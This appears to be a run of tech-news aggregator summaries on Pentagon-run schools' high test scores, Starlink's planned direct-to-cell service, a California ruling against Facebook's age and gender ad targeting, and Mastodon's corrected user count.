Schools for children of military members achieve results rarely seen in public education. From a report: Amy Dilmar, a middle-school principal in Georgia, is well aware of the many crises threatening American education. The lost learning that piled up during the coronavirus pandemic. The gaping inequalities by race and family income that have only gotten worse. A widening achievement gap between the highest- and lowest-performing students. But she sees little of that at her school in Fort Moore, Ga. The students who solve algebra equations and hone essays at Faith Middle School attend one of the highest-performing school systems in the country. It is run not by a local school board or charter network, but by the Defense Department. With about 66,000 students -- more than the public school enrollment in Boston or Seattle -- the Pentagon's schools for children of military members and civilian employees quietly achieve results most educators can only dream of.

On the National Assessment of Educational Progress, a federal exam that is considered the gold standard for comparing states and large districts, the Defense Department's schools outscored every jurisdiction in math and reading last year and managed to avoid widespread pandemic losses. Their schools had the highest outcomes in the country for Black and Hispanic students, whose eighth-grade reading scores outpaced national averages for white students. Eighth graders whose parents only graduated from high school -- suggesting lower family incomes, on average -- performed as well in reading as students nationally whose parents were college graduates. The schools reopened relatively quickly during the pandemic, but last year's results were no fluke. While the achievement of U.S. students overall has stagnated over the last decade, the military's schools have made gains on the national test since 2013. And even as the country's lowest-performing students -- in the bottom 25th percentile -- have slipped further behind, the Defense Department's lowest-performing students have improved in fourth-grade math and eighth-grade reading.

Communications

New Starlink Webpage Highlights Upcoming 'Direct To Cell' Service (mobilesyrup.com) 21

SpaceX quietly published a new "Starlink Direct to Cell" webpage highlighting the company's forthcoming cell service for mobile phones. MobileSyrup reports: The new 'Starlink Direct to Cell' page boasts "seamless access to text, voice, and data for LTE phones across the globe" and notes that the company is targeting text capabilities in 2024, followed by voice and data capabilities in 2025. Internet of Things (IoT) support may also arrive in 2025. Starlink also advertises that the direct-to-cell system would work with "existing LTE phones wherever you can see the sky" and wouldn't require any changes to hardware, firmware, or special apps. The page also explains that Starlink Direct to Cell would use "an advanced eNodeB modem" that "acts like a cellphone tower in space." The system would allow network integration "similar to a standard roaming partner." Last year, SpaceX announced a partnership with T-Mobile, allowing users' mobile phones to connect directly with Starlink satellites in orbit. SpaceX said it was hoping to launch the service later this year but the company has been mum on the progress.

Facebook

Facebook's Sexist, Ageist Ad-Targeting Violates California Law, Court Finds (arstechnica.com) 71

An anonymous reader quotes a report from Ars Technica: Facebook may have to overhaul its entire ad-targeting system after a California court ruled (PDF) last month that the platform's practice of routinely targeting ads by age, gender, and other protected categories violates a state anti-discrimination law. The decision came after a 48-year-old Facebook user, Samantha Liapes, fought for years to prove that Facebook had discriminated against her as an older woman using the platform's ad-targeting system to shop for life insurance policies.

Liapes filed a class-action lawsuit against Facebook in 2020. In her complaint, Liapes alleged that "Facebook requires all advertisers to choose the age and gender of its users who will receive ads, and companies offering insurance products routinely tell it to not send their ads to women or older people." Further, she alleged that Facebook's ad-delivery algorithm magnifies the problem by using these required inputs to serve the ads to "lookalike audiences." Through its algorithm, Liapes alleged that she found that Facebook "discriminates against women and older people," by intentionally excluding them from seeing certain life insurance ads. This, Liapes alleged, caused harm by preventing her from signing up for deals that "often change and may expire" -- deals which she said were disproportionately being advertised on Facebook to younger and/or male audiences. As evidence, Liapes pointed to ads that Facebook did not serve to her -- allegedly because advertisers used the platform's Audience Selection and Lookalike Audience tools to exclude her -- as an older woman [...]. "As a result, she had a harder time learning about those products or services," Liapes' complaint alleged. [...]

Initially, a court agreed with Facebook's arguments that Liapes had not provided sufficient evidence establishing Facebook's intent or demonstrating harms caused, but rather than amend her complaint, Liapes appealed. Then, in what tech law expert Eric Goldman on his blog called a "shocking conclusion," a California court last month reversed that initial decision, finding instead that Facebook's ad-targeting tools are not neutral, discriminate against users by age and gender, and are not immune under Section 230 of the Communications Decency Act. Goldman -- who joked that Liapes wanting more Facebook ads is "a desire shared by almost no one" -- said that the potential impact of this ruling goes beyond possibly shaking up Facebook's ad system. It also seemingly implicates every other ad network by finding that "any gender- or age-based ad targeting for any product or service (and targeting based on any other protected characteristics) could violate the Unruh Act." If the ruling is upheld, that could "have devastating effects on the entire Internet ecosystem," Goldman warned.

"The court's single-minded determination to find a valid discrimination claim under these conditions casts a long and troubling shadow over the online advertising industry," Goldman wrote in his blog. "Who needs new privacy laws if the Unruh Act already bans most ad targeting?"

"The opinion never expressly says that the Unruh Act regulates ad targeting," Goldman told Ars. "It takes some reading between the lines to reach that conclusion."

Social Networks

Mastodon Actually Has 407K+ More Monthly Users Than It Thought (techcrunch.com) 46

A network connectivity error caused Mastodon to severely undercount its users. According to founder and CEO Eugen Rochko, the decentralized social network actually has 407,814 more monthly active users than it had been reporting previously. "The adjustment also included a gain of 2.34 million registered users across an additional 727 servers that had not been counted due to the error," reports TechCrunch. From the report: The issue was impacting the metrics reported on Mastodon's statistics aggregator on its joinmastodon.org/servers page, which had been undercounting users between October 2 and October 8. This issue has now been resolved, Rochko said. That leaves Mastodon with a total of 1.8 million monthly active users at present, an increase of 5% month-over-month and 10,000 servers, up 12% -- a testament to Mastodon's current upward swing at a time when the nature of X continues to remain in flux.
